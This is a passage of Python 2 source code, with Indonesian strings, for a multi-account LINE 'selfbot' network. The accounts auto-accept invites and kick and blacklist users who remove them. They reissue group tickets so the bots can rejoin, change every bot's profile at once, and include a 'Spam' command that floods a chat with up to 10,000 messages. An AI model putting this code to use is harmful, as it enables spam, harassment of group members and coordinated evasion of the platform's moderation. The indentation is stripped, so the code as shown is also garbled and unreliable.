k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ti = ks.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
k1.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k1.getGroup(op.param1)
G.preventJoinByTicket = False
k1.updateGroup(G)
Ti = k1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = ks.getGroup(op.param1)
X.preventJoinByTicket = True
ks.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
k2.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k2.getGroup(op.param1)
G.preventJoinByTicket = False
k2.updateGroup(G)
Ti = k2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k1.getGroup(op.param1)
X.preventJoinByTicket = True
k1.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
k3.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k3.getGroup(op.param1)
G.preventJoinByTicket = False
k3.updateGroup(G)
Ti = k3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k2.getGroup(op.param1)
X.preventJoinByTicket = True
k2.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
k4.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k4.getGroup(op.param1)
G.preventJoinByTicket = False
k4.updateGroup(G)
Ti = k4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k3.getGroup(op.param1)
X.preventJoinByTicket = True
k3.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
k5.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k5.getGroup(op.param1)
G.preventJoinByTicket = False
k5.updateGroup(G)
Ti = k5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k4.getGroup(op.param1)
X.preventJoinByTicket = True
k4.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = k5.getGroup(op.param1)
G.preventJoinByTicket = True
k5.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
if op.type == 19:
if admin in op.param3: #Admin ke Kick
if op.param2 in Bots:
pass
if op.param3 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if mid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = random.choice(DEF).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(DEF).updateGroup(G)
Ti = random.choice(DEF).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = random.choice(DEF).getGroup(op.param1)
X.preventJoinByTicket = True
random.choice(DEF).updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","Min"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
#===========================================
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "|| ADMIN=BABANG ADHI||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
k1.findAndAddContactsByMid(target)
k2.findAndAddContactsByMid(target)
k3.findAndAddContactsByMid(target)
k4.findAndAddContactsByMid(target)
k5.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
#-------------=SC AllBio=---------------- Ganti Bio Semua Bot Format => Allbio: SUKA SUKA KALIAN :D
elif "Allbio:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k1.getProfile()
profile.statusMessage = string
k1.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k2.getProfile()
profile.statusMessage = string
k2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k3.getProfile()
profile.statusMessage = string
k3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k4.getProfile()
profile.statusMessage = string
k4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k5.getProfile()
profile.statusMessage = string
k5.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
#--------------= SC Ganti nama Owner=--------------
elif "Myname:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k1.getProfile()
profile.displayName = string
k1.updateProfile(profile)
k1.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k2.getProfile()
profile.displayName = string
k2.updateProfile(profile)
k2.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k3.getProfile()
profile.displayName = string
k3.updateProfile(profile)
k3.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k4.getProfile()
profile.displayName = string
k4.updateProfile(profile)
k4.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k5.getProfile()
profile.displayName = string
k5.updateProfile(profile)
k5.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Spam " in msg.text:
if msg.from_ in admin and owner:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
k1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
k2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
k3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
